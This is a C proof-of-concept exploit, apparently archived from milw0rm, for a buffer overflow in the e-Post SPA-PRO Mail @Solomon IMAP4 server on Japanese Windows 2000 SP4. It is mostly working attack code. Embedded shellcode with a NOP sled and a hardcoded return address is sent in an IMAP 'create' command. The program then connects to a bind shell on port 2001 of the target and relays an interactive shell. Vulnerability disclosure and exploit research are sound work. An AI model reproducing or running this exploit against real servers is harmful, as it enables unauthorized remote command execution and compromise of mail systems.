//************************************************************************** // e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service Buffer Overflow // Vulnerability // // Bind Shell POC Exploit for Japanese Win2K SP4 // 31 May 2005 // // This POC code binds shell on port 2001 of a vulnerable e-Post // SPA-PRO Mail @Solomon IMAP server. // // This POC assumes default mailbox configuration C:\mail\inbox\%USERNAME% // Any changes to the mailbox configuration will cause this POC to // fail due to the length differences. // // // Advisory // http://www.security.org.sg/vuln/spa-promail4.html // http://www.security.org.sg/vuln/spa-promail4-jp.html // //************************************************************************** #include #include #include #include #pragma comment (lib,"ws2_32.lib") unsigned char expBuf[] = "2 create \"" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x55\x8B\xEC\x33\xC9\x66\xB9\xE8\x03\x2B\xE1\x32\xC0\x8B\xFC\xF3" "\xAA\xB1\x30\x64\x8B\x01\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x70\x08" "\xD9\xEE\xD9\x74\x24\xF4\x5F\x83\xC7\x0C\xEB\x53\x60\x8B\x6C\x24" "\x24\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x8B\x7E\x20\x03\xFD\x8B" "\x4E\x18\x56\x33\xDB\x8B\x37\x03\xF5\x33\xC0\x99\xAC\x85\xC0\x74" "\x07\xC1\xCA\x0D\x03\xD0\xEB\xF4\x3B\x54\x24\x2C\x74\x09\x83\xC7" "\x04\x43\xE2\xE1\x5E\xEB\x16\x5E\x8B\x7E\x24\x03\xFD\x66\x8B\x04" "\x5F\x8B\x7E\x1C\x03\xFD\x8B\x04\x87\x01\x44\x24\x24\x61\xC3\x89" "\x75\xF4\x68\x8E\x4E\x0E\xEC\x56\xFF\xD7\x59\x33\xC0\x66\xB8\x6C" "\x6C\x50\x68\x33\x32\x2E\x64\x68\x77\x73\x32\x5F\x54\xFF\xD1\x8B" "\xF0\x68\xD9\x09\xF5\xAD\x56\xFF\xD7\x5B\x83\xC4\x20\x6A\x01\x6A" "\x02\xFF\xD3\x89\x45\xD0\x68\xA4\x1A\x70\xC7\x56\xFF\xD7\x5B\x33" "\xC0\x50\xB8\xFD\xFF\xF8\x2E\x83\xF0\xFF\x50\x8B\xC4\x6A\x10\x50" "\xFF\x75\xD0\xFF\xD3\x68\xA4\xAD\x2E\xE9\x56\xFF\xD7\x5B\xFF\x75" "\xD0\xFF\xD3\x8B\xCC\x6A\x10\x8B\xDC\x68\x35\x54\x8A\xA1\x56\xFF" "\xD7\x5A\x50\x50\x53\x51\xFF\x75\xD0\xFF\xD2\x8B\xD0\x68\xE7\x79" "\xC6\x79\x56\xFF\xD7\x58\x89\x45\xF0\x8B\x75\xF4\x83\xC4\x20\xC6" "\x04\x24\x44\xC6\x44\x24\x2D\x01\x89\x54\x24\x38\x89\x54\x24\x3C" "\x89\x54\x24\x40\x8B\xC4\x8D\x58\x44\x68\x72\xFE\xB3\x16\x56\xFF" "\xD7\x5A\xB9\xFF\x63\x6D\x64\xC1\xE9\x08\x51\x8B\xCC\x53\x53\x50" "\x33\xC0\x50\x50\x50\x6A\x01\x50\x50\x51\x50\xFF\xD2\x5B\x68\xAD" "\xD9\x05\xCE\x56\xFF\xD7\x58\x6A\xFF\xFF\x33\xFF\xD0\xFF\x74\x24" "\x48\xFF\x55\xF0\xFF\x75\xD0\xFF\x55\xF0\x68\xEF\xCE\xE0\x60\x56" "\xFF\xD7\x58\xFF\xD0\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\xe9\x4f\xfe\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x54\x54\x54\x54" "\x55\x55\x55\x55\x56\x56\x56\x56\x57\x57\x57\x57\xE9\x0C\xFE\xFF" "\xFF\xCC\xEB\xa0\x5A\xD6\x19\xF8\x74\x41\x41\x41\x42\x42\x42\x42" "\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46" "\x47\x47\x47\x47\x48\x48\x48\x48\x36\x49\x49\x49\x4A\x4A\x4A\x4A" "\x4B\x4B\x4B\x4B\x4C\x4C\x4C\x4C\x4D\x4D\x4D\x4D\x4E\x4E\x4E\x4E" "\x4F\x4F\x4F\x4F\x50\x50\x50\x50\x51\x51\x51\x51\x52\x52\x52\x52" "\x53\x53\x53\x53\x54\x54\x54\x54\x55\x55\x55\x55\x56\x56\x56\x56" "\x57\x57\x57\x57\x58\x58\x58\x58\x59\x59\x59\x59\x5A\x5A\x5A\x5A" "\"\r\n"; void shell(int sockfd) { char buffer[1024]; fd_set rset; FD_ZERO(&rset); for(;;) { if(kbhit() != 0) { fgets(buffer, sizeof(buffer) - 2, stdin); send(sockfd, buffer, strlen(buffer), 0); } FD_ZERO(&rset); FD_SET(sockfd, &rset); timeval tv; tv.tv_sec = 0; tv.tv_usec = 50; if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR) { printf("select error\n"); break; } if(FD_ISSET(sockfd, &rset)) { int n; ZeroMemory(buffer, sizeof(buffer)); if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0) { printf("EOF\n"); return; } else { fwrite(buffer, 1, n, stdout); } } } } #define ADDR_POSITION 534 #define RET_ADDR 0x74F819D6 // CALL EBX in Japanese Win2K SP4 // First short jump backwards. (EB AO) // You should know what to change here, landing onto INT 3 to let debugger kick in. #define FIRST_BACKJMP_INST 0x5AA0EBCC int main(int argc, char* argv[]) { WORD wVersionRequested; WSADATA wsaData; struct sockaddr_in sin; int err; char inBuffer[10000]; char loginBuf[1000]; if(argc != 4) { printf("\nUsage: %s \n", argv[0]); return 1; } if(strlen(argv[1]) <= 0 || strlen(argv[1]) > 20) { printf("\nInvalid IMAP username! Maximum username length is 20.\n"); return 1; } if(strlen(argv[2]) <= 0 || strlen(argv[2]) > 14) { printf("\nInvalid IMAP password! Maximum password length is 14.\n"); return 1; } memset(loginBuf, 0, sizeof(loginBuf)); _snprintf(loginBuf, sizeof(loginBuf), "1 login \"%s\" \"%s\"\r\n", argv[1], argv[2]); loginBuf[sizeof(loginBuf)-1] = 0; int retPos = ADDR_POSITION - (strlen(argv[1]) - 1); *((DWORD *)&expBuf[retPos]) = RET_ADDR; *((DWORD *)&expBuf[retPos-4]) = FIRST_BACKJMP_INST; wVersionRequested = MAKEWORD(2,0); err = WSAStartup(wVersionRequested, &wsaData); if(err != 0) { printf("\nWSAStartup Error.\n"); return 1; } if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0) { printf("\nWinsock Version Error\n"); WSACleanup(); return 1; } SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0); sin.sin_addr.s_addr = inet_addr(argv[3]); sin.sin_family = AF_INET; sin.sin_port = htons(143); printf("\n[+] Trying to connect to %s\n", inet_ntoa(sin.sin_addr)); if(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR) { int size; // read IMAP banner size = recv(s, inBuffer, sizeof(inBuffer), 0); if(size == SOCKET_ERROR) { printf("[-] Error receiving IMAP banner!\n"); return 1; } printf("[+] IMAP banner received!\n\n"); fwrite(inBuffer, 1, size, stdout); printf("\n"); if(send(s, (char *)loginBuf, strlen((char *)loginBuf), 0) == SOCKET_ERROR) { printf("[-] Error sending login!\n"); return 1; } printf("[+] Login Sent.\n"); size = recv(s, inBuffer, sizeof(inBuffer), 0); if(size == SOCKET_ERROR) { printf("[-] Error receiving login reply!\n"); return 1; } if(strstr(inBuffer, "OK")) printf("[+] Login successful!\n"); else { printf("[+] Login failed!\n"); return 1; } if(send(s, (char *)expBuf, strlen((char *)expBuf), 0) == SOCKET_ERROR) { printf("[-] Error sending exploit!\n"); return 1; } else { printf("[+] Exploit sent!\n"); } Sleep(2000); //================================= Connect to the target ============================== SOCKET sock = socket(AF_INET, SOCK_STREAM, 0); if(sock == INVALID_SOCKET) { printf("Invalid socket return in socket() call.\n"); WSACleanup(); return -1; } sin.sin_family = AF_INET; sin.sin_port = htons(2001); sin.sin_addr.s_addr = inet_addr(argv[3]); if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR) { printf("Exploit Failed. SOCKET_ERROR return in connect call.\n"); closesocket(sock); WSACleanup(); return -1; } printf("[+] Exploit successful!\n\n"); shell(sock); closesocket(sock); } else { printf("[-] Cannot connect!\n"); } closesocket(s); WSACleanup(); return 0; } // milw0rm.com [2005-06-02]